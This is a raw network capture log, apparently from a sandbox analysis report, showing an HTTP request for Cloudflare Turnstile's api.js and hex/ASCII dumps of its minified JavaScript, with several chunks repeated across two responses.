2025-01-23 23:03:20 UTC	471	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:20 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 48121 Connection: close accept-ranges: bytes last-modified: Tue, 21 Jan 2025 23:46:19 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 906b6a9f6b400f83-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:20 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75 Data Ascii: e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 71 74 28 65 29 7c 7c 7a 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 56 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(a))return ot(e,t)}}function Se(e,t){return qt(e)\|\|zt(e,t)\|\|Xt(e,t)\|\|Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var a={label:0,sent:function(){if(l[0
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(fu
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b Data Ascii: R="never",e.MANUAL="manual",e.AUTO="auto"})(ee\|\|(ee={}));var ce;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ce\|\|(ce={}));var Q;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(Q\|\|(Q={}));var me;
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 22 73 74 72 69 6e 67 22 26 26 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 4c 2e 4e 4f 52 4d 41 4c 2c 4c 2e 43 4f 4d 50 41 43 54 2c 4c 2e 49 4e 56 49 53 49 42 4c 45 2c 4c 2e 46 4c 45 58 49 42 4c 45 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 6b 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 Data Ascii: "string"&&Nr.test(e)}function pt(e){return M([L.NORMAL,L.COMPACT,L.INVISIBLE,L.FLEXIBLE],e)}function vt(e){return M(["auto","manual","never"],e)}function mt(e){return M(["auto","manual","never"],e)}var kr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){retu
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 49 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44 22 3a 22 66 62 45 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 73 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 70 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 Data Ascii: o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,g,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",I=a["feedback-enabled"]===!1?"fbD":"fbE";return"".concat(s,"/cdn-cgi/challenge-platform/").concat(p,"turnstile/if/ov
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 29 7b 69 66 28 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 3d 3d 22 75 6e 64 65 66 69 6e 65 Data Ascii: if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),t&&te(e,t)}function ze(){if(typeof Reflect=="undefine
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 71 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 7a 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 73 72 28 74 68 69 73 2c 63 29 7d 7d 76 61 72 20 66 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 75 72 28 61 2c 65 29 3b 76 61 72 20 74 3d 64 72 28 61 29 3b Data Ascii: eof t=="function")?t:qe(e)}function dr(e){var t=ze();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,arguments);return sr(this,c)}}var fr=function(e){"use strict";ur(a,e);var t=dr(a);
2025-01-23 23:03:20 UTC	1369	IN	Data Raw: 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 6c 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b 74 2e 77 72 61 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 6d 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 28 23 22 2e 63 6f 6e 63 61 74 28 Data Ascii: -cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((l=t.params.theme)!==null&&l!==void 0?l:t.theme,"/").concat(a);t.wrapper.parentNode\|\|m("Cannot initialize Widget, Element not found (#".concat(

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:20 UTC	383	OUT	GET /turnstile/v0/b/725bd36e298b/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:21 UTC	471	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:20 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 48121 Connection: close accept-ranges: bytes last-modified: Tue, 21 Jan 2025 23:46:19 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 906b6aa408d3ef9d-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:21 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75 Data Ascii: e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 71 74 28 65 29 7c 7c 7a 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 56 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(a))return ot(e,t)}}function Se(e,t){return qt(e)\|\|zt(e,t)\|\|Xt(e,t)\|\|Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ve(e,t){var a={label:0,sent:function(){if(l[0
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var Pe=300030;var We=300031;var j;(fu
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b Data Ascii: R="never",e.MANUAL="manual",e.AUTO="auto"})(ee\|\|(ee={}));var ce;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ce\|\|(ce={}));var Q;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(Q\|\|(Q={}));var me;
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 22 73 74 72 69 6e 67 22 26 26 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 4c 2e 4e 4f 52 4d 41 4c 2c 4c 2e 43 4f 4d 50 41 43 54 2c 4c 2e 49 4e 56 49 53 49 42 4c 45 2c 4c 2e 46 4c 45 58 49 42 4c 45 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 6b 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 Data Ascii: "string"&&Nr.test(e)}function pt(e){return M([L.NORMAL,L.COMPACT,L.INVISIBLE,L.FLEXIBLE],e)}function vt(e){return M(["auto","manual","never"],e)}function mt(e){return M(["auto","manual","never"],e)}var kr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){retu
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 49 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44 22 3a 22 66 62 45 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 73 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 70 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 Data Ascii: o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,g,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",I=a["feedback-enabled"]===!1?"fbD":"fbE";return"".concat(s,"/cdn-cgi/challenge-platform/").concat(p,"turnstile/if/ov
2025-01-23 23:03:21 UTC	1369	IN	Data Raw: 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 29 7b 69 66 28 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 3d 3d 22 75 6e 64 65 66 69 6e 65 Data Ascii: if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),t&&te(e,t)}function ze(){if(typeof Reflect=="undefine
